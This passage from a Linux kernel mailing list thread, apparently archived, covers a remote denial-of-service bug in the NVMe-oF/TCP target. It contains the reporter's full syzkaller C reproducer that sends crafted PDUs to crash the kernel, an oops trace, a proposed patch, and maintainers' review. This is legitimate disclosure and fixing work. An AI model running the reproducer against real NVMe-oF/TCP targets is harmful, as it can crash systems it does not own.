+		struct nvme_command *nvme_cmd = &queue->pdu.cmd.cmd;
+		struct nvmet_req *req = &cmd->req;
+
 		pr_err("ttag %u unexpected data offset %u (expected %u)\n",
 			data->ttag, le32_to_cpu(data->data_offset),
 			cmd->rbytes_done);
-		/* FIXME: use path and transport errors */
-		nvmet_req_complete(&cmd->req,
-			NVME_SC_INVALID_FIELD | NVME_SC_DNR);
+
+		memcpy(req->cmd, nvme_cmd, sizeof(*nvme_cmd));
+		if (unlikely(!nvmet_req_init(req, &queue->nvme_cq,
+				&queue->nvme_sq, &nvmet_tcp_ops))) {
+			pr_err("failed cmd %p id %d opcode %d, data_len: %d\n",
+				req->cmd, req->cmd->common.command_id,
+				req->cmd->common.opcode,
+				le32_to_cpu(req->cmd->common.dptr.sgl.length));
+			nvmet_tcp_handle_req_failure(queue, cmd, req);
+		} else {
+			/* FIXME: use path and transport errors */
+			nvmet_req_complete(&cmd->req,
+					NVME_SC_INVALID_FIELD | NVME_SC_DNR);
+		}
 		return -EPROTO;
 	}

I'll try to reproduce these problems; otherwise I'll ping you offline...

-ck

[1]
nvme (nvme-6.7) # nvme list
Node          Generic      SN                    Model            Namespace  Usage                Format        FW Rev
------------  -----------  --------------------  ---------------  ---------  -------------------  ------------  --------
/dev/nvme1n1  /dev/ng1n1   408a5a6db1e890944886  Linux            1          1.07 GB / 1.07 GB    512 B + 0 B   6.6.0nvm
/dev/nvme0n1  /dev/ng0n1   foo                   QEMU NVMe Ctrl   1          1.07 GB / 1.07 GB    512 B + 0 B   1.0
nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_trtype
tcp
nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_traddr
127.0.0.1
nvme (nvme-6.7) # ./a.out
nvme (nvme-6.7) # dmesg  -c
[22106.230605] loop: module loaded
[22106.246494] run blktests nvme/004 at 2023-11-07 01:58:06
[22106.279272] loop0: detected capacity change from 0 to 2097152
[22106.294374] nvmet: adding nsid 1 to subsystem blktests-subsystem-1
[22106.302392] nvmet_tcp: enabling port 0 (127.0.0.1:4420)
[22106.320146] nvmet: creating nvm controller 1 for subsystem 
blktests-subsystem-1 for NQN 
nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349.
[22106.320859] nvme nvme1: creating 48 I/O queues.
[22106.326035] nvme nvme1: mapped 48/0/0 default/read/poll queues.
[22106.336551] nvme nvme1: new ctrl: NQN "blktests-subsystem-1", addr 
127.0.0.1:4420
[22180.507777] nvmet_tcp: failed to allocate queue, error -107




* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-07 10:03 ` Chaitanya Kulkarni
@ 2023-11-09 13:17   ` Alon Zahavi
  2023-11-15  9:02     ` Alon Zahavi
  2023-11-20 10:56   ` Sagi Grimberg
  1 sibling, 1 reply; 6+ messages in thread
From: Alon Zahavi @ 2023-11-09 13:17 UTC (permalink / raw)
  To: Chaitanya Kulkarni; +Cc: linux-nvme, Sagi Grimberg, Christoph Hellwig

On Tue, 7 Nov 2023 at 12:03, Chaitanya Kulkarni <chaitanyak@nvidia.com> wrote:
>
> On 11/6/23 05:41, Alon Zahavi wrote:
> > # Bug Overview
> >
> > ## The Bug
> > A null-ptr-deref in `__nvmet_req_complete`.
> >
> > ## Bug Location
> > `drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.
> >
> > ## Bug Class
> > Remote Denial of Service
> >
> > ## Disclaimer:
> > This bug was found using Syzkaller with NVMe-oF/TCP added support.
> >
> > # Technical Details
> >
> > ## Kernel Report - NULL Pointer Dereference
> >
> > BUG: kernel NULL pointer dereference, address: 0000000000000020
> > #PF: supervisor read access in kernel mode
> > #PF: error_code(0x0000) - not-present page
> > PGD 0 P4D 0
> > Oops: 0000 [#1] PREEMPT SMP NOPTI
> > CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
> > Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
> > Reference Platform, BIOS 6.00 11/12/2020
> > Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> > RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
> > Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
> > d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
> > b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
> > RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
> > RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
> > RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
> > RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
> > R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
> > R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
> > FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
> > CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
> > PKRU: 55555554
> > Call Trace:
> >   <TASK>
> >   nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
> >   nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
> >   nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
> >   nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
> >   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
> >   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
> >   nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
> >   process_one_work+0x3da/0x870 kernel/workqueue.c:2597
> >   worker_thread+0x67/0x640 kernel/workqueue.c:2748
> >   kthread+0x164/0x1b0 kernel/kthread.c:389
> >   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
> >   </TASK>
> >
> > ## Description
> >
> > ### Tracing The Bug
> > The bug occurs during the execution of `__nvmet_req_complete`. Looking
> > at the report generated by syzkaller, we can see the exact line of
> > code that triggers the bug.
> >
> > Code Block 1:
> > ```
> > static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
> > {
> > 	struct nvmet_ns *ns = req->ns;
> >
> > 	if (!req->sq->sqhd_disabled) // 1
> > 		nvmet_update_sq_head(req);
> >
> > 	...
> > }
> > ```
> >
> > In the first code block, we can see that there is a dereference of
> > `req->sq` when checking the condition `if (!req->sq->sqhd_disabled)`.
> > However, when executing the reproducer, `req->sq` is NULL. When trying
> > to dereference it, the kernel triggers a panic.
> >
> > ## Root Cause
> > `req` is initialized during `nvmet_req_init`. However, the sequence
> > that leads into `__nvmet_req_complete` does not contain any call to
> > `nvmet_req_init`, so the kernel crashes with a NULL pointer
> > dereference. This flow of execution can also create a situation in
> > which an uninitialized memory address is dereferenced, which has
> > undefined behaviour.
> >
> > ## Reproducer
> > I am adding a reproducer generated by Syzkaller with some
> > optimizations and minor changes.
> >
> > ```
> > // autogenerated by syzkaller (https://github.com/google/syzkaller)
> >
> > #define _GNU_SOURCE
> >
> > #include <endian.h>
> > #include <errno.h>
> > #include <fcntl.h>
> > #include <sched.h>
> > #include <stdarg.h>
> > #include <stdbool.h>
> > #include <stdint.h>
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <sys/mount.h>
> > #include <sys/prctl.h>
> > #include <sys/resource.h>
> > #include <sys/stat.h>
> > #include <sys/syscall.h>
> > #include <sys/time.h>
> > #include <sys/types.h>
> > #include <sys/wait.h>
> > #include <unistd.h>
> >
> > #include <linux/capability.h>
> >
> > uint64_t r[1] = {0xffffffffffffffff};
> >
> > void loop(void)
> > {
> >    intptr_t res = 0;
> >    res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
> >    if (res != -1)
> >      r[0] = res;
> >    *(uint16_t*)0x20000100 = 2;
> >    *(uint16_t*)0x20000102 = htobe16(0x1144);
> >    *(uint32_t*)0x20000104 = htobe32(0x7f000001);
> >    syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
> >    *(uint8_t*)0x200001c0 = 0;
> >    *(uint8_t*)0x200001c1 = 0;
> >    *(uint8_t*)0x200001c2 = 0x80;
> >    *(uint8_t*)0x200001c3 = 0;
> >    *(uint32_t*)0x200001c4 = 0x80;
> >    *(uint16_t*)0x200001c8 = 0;
> >    *(uint8_t*)0x200001ca = 0;
> >    *(uint8_t*)0x200001cb = 0;
> >    *(uint32_t*)0x200001cc = 0;
> >    memcpy((void*)0x200001d0,
> >           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
> >           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
> >           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
> >           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
> >           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
> >           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
> >           "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
> >           112);
> >    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
> >            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> >    *(uint8_t*)0x20000080 = 6;
> >    *(uint8_t*)0x20000081 = 3;
> >    *(uint8_t*)0x20000082 = 0x18;
> >    *(uint8_t*)0x20000083 = 0x1c;
> >    *(uint32_t*)0x20000084 = 2;
> >    *(uint16_t*)0x20000088 = 0x5d;
> >    *(uint16_t*)0x2000008a = 3;
> >    *(uint32_t*)0x2000008c = 0;
> >    *(uint32_t*)0x20000090 = 7;
> >    memcpy((void*)0x20000094, "\x83\x9e\x4f\x1a", 4);
> >    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
> >            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> > }
> > int main(void)
> > {
> >    syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
> >            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
> >    syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
> >            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
> >    syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
> >            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
> >    loop();
> >    return 0;
> > }
> > ```
> >
> >
>
>
> I'm not able to reproduce the problem [1]; all I get is the following error
> once I set up a target with NVMe-oF/TCP and run the above program :-
>
> [22180.507777] nvmet_tcp: failed to allocate queue, error -107
>
> Can you try the following patch? Full disclosure: I've compile-tested it
> and built it based on code inspection only :-
>
> diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
> index 92b74d0b8686..e35e8d79c66a 100644
> --- a/drivers/nvme/target/tcp.c
> +++ b/drivers/nvme/target/tcp.c
> @@ -992,12 +992,26 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct nvmet_tcp_queue *queue)
>          }
>
>          if (le32_to_cpu(data->data_offset) != cmd->rbytes_done) {
> +               struct nvme_command *nvme_cmd = &queue->pdu.cmd.cmd;
> +               struct nvmet_req *req = &cmd->req;
> +
>                  pr_err("ttag %u unexpected data offset %u (expected %u)\n",
>                          data->ttag, le32_to_cpu(data->data_offset),
>                          cmd->rbytes_done);
> -               /* FIXME: use path and transport errors */
> -               nvmet_req_complete(&cmd->req,
> -                       NVME_SC_INVALID_FIELD | NVME_SC_DNR);
> +
> +               memcpy(req->cmd, nvme_cmd, sizeof(*nvme_cmd));
> +               if (unlikely(!nvmet_req_init(req, &queue->nvme_cq,
> +                               &queue->nvme_sq, &nvmet_tcp_ops))) {
> +                       pr_err("failed cmd %p id %d opcode %d, data_len: %d\n",
> +                               req->cmd, req->cmd->common.command_id,
> +                               req->cmd->common.opcode,
> +                               le32_to_cpu(req->cmd->common.dptr.sgl.length));
> +                       nvmet_tcp_handle_req_failure(queue, cmd, req);
> +               } else {
> +                       /* FIXME: use path and transport errors */
> +                       nvmet_req_complete(&cmd->req,
> +                                       NVME_SC_INVALID_FIELD | NVME_SC_DNR);
> +               }
>                  return -EPROTO;
>          }
>
> I'll try to reproduce these problems, else will ping you offline...
>
> -ck
>
> [1]
> nvme (nvme-6.7) # nvme list
> Node                  Generic               SN                   Model                                    Namespace Usage                      Format           FW Rev
> --------------------- --------------------- -------------------- ---------------------------------------- --------- -------------------------- ---------------- --------
> /dev/nvme1n1          /dev/ng1n1            408a5a6db1e890944886 Linux                                    1          1.07  GB / 1.07  GB       512   B +  0 B   6.6.0nvm
> /dev/nvme0n1          /dev/ng0n1            foo                  QEMU NVMe Ctrl                           1          1.07  GB / 1.07  GB       512   B +  0 B   1.0
> nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_trtype
> tcp
> nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_traddr
> 127.0.0.1
> nvme (nvme-6.7) # ./a.out
> nvme (nvme-6.7) # dmesg  -c
> [22106.230605] loop: module loaded
> [22106.246494] run blktests nvme/004 at 2023-11-07 01:58:06
> [22106.279272] loop0: detected capacity change from 0 to 2097152
> [22106.294374] nvmet: adding nsid 1 to subsystem blktests-subsystem-1
> [22106.302392] nvmet_tcp: enabling port 0 (127.0.0.1:4420)
> [22106.320146] nvmet: creating nvm controller 1 for subsystem
> blktests-subsystem-1 for NQN
> nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349.
> [22106.320859] nvme nvme1: creating 48 I/O queues.
> [22106.326035] nvme nvme1: mapped 48/0/0 default/read/poll queues.
> [22106.336551] nvme nvme1: new ctrl: NQN "blktests-subsystem-1", addr
> 127.0.0.1:4420
> [22180.507777] nvmet_tcp: failed to allocate queue, error -107
>
>

I tested the patch and it does mitigate the problem.

Thanks,
Alon.


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-09 13:17   ` Alon Zahavi
@ 2023-11-15  9:02     ` Alon Zahavi
  0 siblings, 0 replies; 6+ messages in thread
From: Alon Zahavi @ 2023-11-15  9:02 UTC (permalink / raw)
  To: Chaitanya Kulkarni; +Cc: linux-nvme, Sagi Grimberg, Christoph Hellwig

On Thu, 9 Nov 2023 at 15:17, Alon Zahavi <zahavi.alon@gmail.com> wrote:
>
> [...]
>
> I tested the patch and it does mitigate the problem.
>
> Thanks,
> Alon.

Checking if there's any update regarding the patch.


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-07 10:03 ` Chaitanya Kulkarni
  2023-11-09 13:17   ` Alon Zahavi
@ 2023-11-20 10:56   ` Sagi Grimberg
  1 sibling, 0 replies; 6+ messages in thread
From: Sagi Grimberg @ 2023-11-20 10:56 UTC (permalink / raw)
  To: Chaitanya Kulkarni, Alon Zahavi, linux-nvme; +Cc: Christoph Hellwig



On 11/7/23 12:03, Chaitanya Kulkarni wrote:
> On 11/6/23 05:41, Alon Zahavi wrote:
>> [...]
> 
> 
> I'm not able to reproduce the problem [1]; all I get is the following error
> once I set up a target with NVMe-oF/TCP and run the above program :-
>
> [22180.507777] nvmet_tcp: failed to allocate queue, error -107
>
> Can you try the following patch? Full disclosure: I've compile-tested it
> and built it based on code inspection only :-

Yes, it looks like we are missing the same handling when we get a
malformed h2cdata pdu. If we want to gracefully fail it and keep the
connection going, we need to properly handle the failure.

Although, I didn't understand why we should try to initialize the request
in this case? It's a clear error at this point...

> 
> diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
> index 92b74d0b8686..e35e8d79c66a 100644
> --- a/drivers/nvme/target/tcp.c
> +++ b/drivers/nvme/target/tcp.c
> @@ -992,12 +992,26 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct nvmet_tcp_queue *queue)
>          }
>
>          if (le32_to_cpu(data->data_offset) != cmd->rbytes_done) {
> +               struct nvme_command *nvme_cmd = &queue->pdu.cmd.cmd;
> +               struct nvmet_req *req = &cmd->req;
> +
>                  pr_err("ttag %u unexpected data offset %u (expected %u)\n",
>                          data->ttag, le32_to_cpu(data->data_offset),
>                          cmd->rbytes_done);
> -               /* FIXME: use path and transport errors */
> -               nvmet_req_complete(&cmd->req,
> -                       NVME_SC_INVALID_FIELD | NVME_SC_DNR);
> +
> +               memcpy(req->cmd, nvme_cmd, sizeof(*nvme_cmd));
> +               if (unlikely(!nvmet_req_init(req, &queue->nvme_cq,
> +                               &queue->nvme_sq, &nvmet_tcp_ops))) {
> +                       pr_err("failed cmd %p id %d opcode %d, data_len: %d\n",
> +                               req->cmd, req->cmd->common.command_id,
> +                               req->cmd->common.opcode,
> +                               le32_to_cpu(req->cmd->common.dptr.sgl.length));
> +                       nvmet_tcp_handle_req_failure(queue, cmd, req);
> +               } else {
> +                       /* FIXME: use path and transport errors */
> +                       nvmet_req_complete(&cmd->req,
> +                                       NVME_SC_INVALID_FIELD | NVME_SC_DNR);
> +               }
>                  return -EPROTO;
>          }
> 
> I'll try to reproduce these problems, else will ping you offline...
> 
> -ck
> 
> [1]
> [...]


^ permalink raw reply	[flat|nested] 6+ messages in thread

end of thread, other threads:[~2023-11-20 10:56 UTC | newest]

Thread overview: 6+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2023-11-06 13:41 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete` Alon Zahavi
2023-11-06 21:35 ` Chaitanya Kulkarni
2023-11-07 10:03 ` Chaitanya Kulkarni
2023-11-09 13:17   ` Alon Zahavi
2023-11-15  9:02     ` Alon Zahavi
2023-11-20 10:56   ` Sagi Grimberg

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).